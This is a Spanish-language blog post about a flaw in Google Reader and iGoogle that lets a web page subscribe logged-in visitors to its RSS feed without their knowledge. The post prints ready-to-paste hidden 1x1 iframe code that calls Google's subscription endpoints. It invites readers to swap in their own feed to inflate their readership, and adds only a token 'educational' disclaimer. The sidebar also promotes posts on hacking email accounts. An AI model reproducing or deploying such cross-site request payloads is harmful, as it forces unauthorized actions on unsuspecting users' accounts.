| @Mishaki al lado de la puerta del ayuntamiento in reply to Mishaki 2 days ago |
Exploit en Google Reader permite auto-agregar un RSS
Categorizado en blogosfera, google, seguridad
Alguna vez has abierto tu cuenta de Google Reader o tu página personalizada de Google y has visto que tenias un RSS que no recordabas haber agregado? Entonces la respuesta quizás sea debido a un problema que tiene Google con la seguridad a la hora de manejar las nuevas inscripciones a RSS.
El problema en este caso es que muchas páginas pueden copiar los enlaces de Agregar a la página de Google o Agregar a Google Reader y abrirlos en un iframe para cada visitante, de esta forma cuando cualquier persona visite la página mientras este logueado con su cuenta de Google, se suscribirá automáticamente al RSS de la página. Una práctica bastante zorra, pero solo factible para los blogs o páginas que carecen de reputación, ya que si alguna página conocida llega a explotar este fallo perdería mucha reputación.
Lo único que hay que hacer es agregar este código en las páginas, cambiando mi feed por el que quieras utilizar, y bum! ya tienes muchos lectores más.
<iframe width="1" height="1" border="0" scrolling="0" src="http://www.google.com/ig/setp?et=GCZWwdGf& source=ign_&url=http:// www.google.com/ig&n_25=url%3Dhttp:// feeds.feedburner.com/pablogeo%26val%3D3" mce_src="http://www.google.com/ig/setp?et=GCZWwdGf& source=ign_&url=http:// www.google.com/ig&n_25=url%3Dhttp:// feeds.feedburner.com/pablogeo%26val%3D3"></iframe><iframe width="1" height="1" border="0" scrolling="0" src="http://www.google.com/ig/addtoreader?et= 4x_zc136&source=ign_&feedurl= http://feeds.feedburner.com/pablogeo& feedtitle=pablogeo&url=http://www.google .com/ig/add%3Ffeedurl%3Dhttp://feeds.feed burner.com/pablogeo" mce_src="http://www.google.com/ig/addtoreader?et= 4x_zc136&source=ign_&feedurl= http://feeds.feedburner.com/pablogeo& feedtitle=pablogeo&url=http://www.google .com/ig/add%3Ffeedurl%3Dhttp://feeds.feed burner.com/pablogeo"></iframe>
De esta manera se comprueba, otra vez, los fallos que tiene la empresa más importante de Sillicon Valley.
El material expuesto en esta noticia solo tiene fines educativos y esta expuesto para llamar la atención a Google (que no lo van a leer pero queda bien decirlo).
vía | blogstorm
Tags:
| Y ahora qué hago? |
Entradas populares
- Made in China, gran inventario de clones
- Guía WordPress SEO
- Hackear un correo electrónico en segundos
- Espiar conversaciones de Messenger en red local
- Cómo liberar el iPhone
- Lista de páginas para descargar música legalmente y gratis
- 23 Sitios para ganar dinero con tus videos
- Estadísticas Web, que usar?
- Google y los resultados personalizados
- Descarga directa de música gratis






1 Comentario en “Exploit en Google Reader permite auto-agregar un RSS”
casulidad mi nombre es pable guerrero com tu wew pablogeo
Comenta sobre Exploit en Google Reader permite auto-agregar un RSS